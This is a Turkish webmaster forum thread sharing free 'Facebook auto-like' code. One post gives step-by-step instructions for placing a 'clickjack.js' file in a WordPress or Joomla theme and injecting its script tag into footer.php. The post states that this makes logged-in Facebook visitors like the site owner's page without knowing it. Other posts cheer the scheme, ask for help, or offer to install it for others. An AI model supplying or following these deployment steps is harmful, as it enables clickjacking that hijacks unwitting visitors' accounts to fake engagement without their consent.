İyinet'e Hoşgeldiniz!

Türkiye'nin En Eski Webmaster Forum'una Hemen Kayıt Olun!

Kayıt Ol!

Facebook auto-like kodları (ücretsiz)

Ozcan

0
İyinet Üyesi
Reaction score
59
Vay :D süper ne zamandır bunu arıyordum sayfayı 3-5 milyon yaparım artık siteler sağolsun birde kodu paylaşan arkadaş :)
gecenin bu yarısı 4-5 kişi beğendi :D ekler eklemez

fatyh

0
İyinet Üyesi
Onaylı Üye
Reaction score
0
teşekkürler hocam

edit: hocam bu kodu resmin üzerine nasıl ekliyoruz :S

fatyh

0
İyinet Üyesi
Onaylı Üye
Reaction score
0
hocam beğenmekten vazgeçiyor ama beğenmiyor nasıl yapabilirim yardımcı olur musunuz :(

buR0ck

0
İyinet Üyesi
Reaction score
0
Hocam ben anlayamadım ya :/

Nerde Çıkıcak bu auto like ?

ozan

0
İyinet Üyesi
Reaction score
0
Hocam yapamadım Dosyayı hangi şeyle açıcam hata veriyo

takocan1

0
İyinet Üyesi
Reaction score
0
Kardesim video koysan daha mukemmel olurdu :) yapamadık :/

Otolike

0
İyinet Üyesi
Reaction score
0
Yapamayanlar Bana PM atsan yardımcı olup kendısıne kurayım

baba

0
İyinet Üyesi
Reaction score
0
Gelen özel mesajlara cevap vermek yerine herkesin istifade edebileceği şekilde burada açıklayalım.
Siteden indirdiğiniz zip dosyasını bilgisayarınıza çıkartın. Daha sonra bu dosyaları joomla veya wordpress olan sitenizin tema (wordpress için wp-content/themes/temanızın adı/) klasörünün içine kopyalayın. Kopyaladığınız dosya "clickjack.js" dosyasını açıp 14.satırdaki
Kod:
http://www.facebook.com/pages/[COLOR=#ff0000][B]Komik-Adam/453195788025233[/B][/COLOR]
satırındaki kırmızı harflerle yazılanların yerine kendi facebook sayfa adresinizi ekleyin.Daha sonra dosyayı kaydedin. Temanızın footer.php dosyasını açın ve en son </div> kodunu bulup altına aşağıdaki satırı ekleyip kaydedin. Hepsi bu.
Kod:
</div>
<script src=" <?php bloginfo('template_url'); ?>/clickjack.js"></script>

Not: zip dosyasından çıkarttığınız dosyalar site temanız ile aynı klasörde olmalıdır. Ayrıca sitenizden birşey çıkmasını beklemeyin.Sistem sadece oturum kapatmamış facebook kullanıcısına sitenizi beğendiriyor.

Türkiye’nin ilk webmaster forum sitesi iyinet.com'da forum üyeleri tarafından yapılan tüm paylaşımlardan; Türk Ceza Kanunu’nun 20. Maddesinin, 5651 Sayılı Kanununun 4. maddesinin 2. fıkrasına göre, paylaşım yapan üyeler sorumludur.

Backlink ve Tanıtım Yazısı için iletişime geçmek için Skype Adresimiz: .cid.1580508955483fe5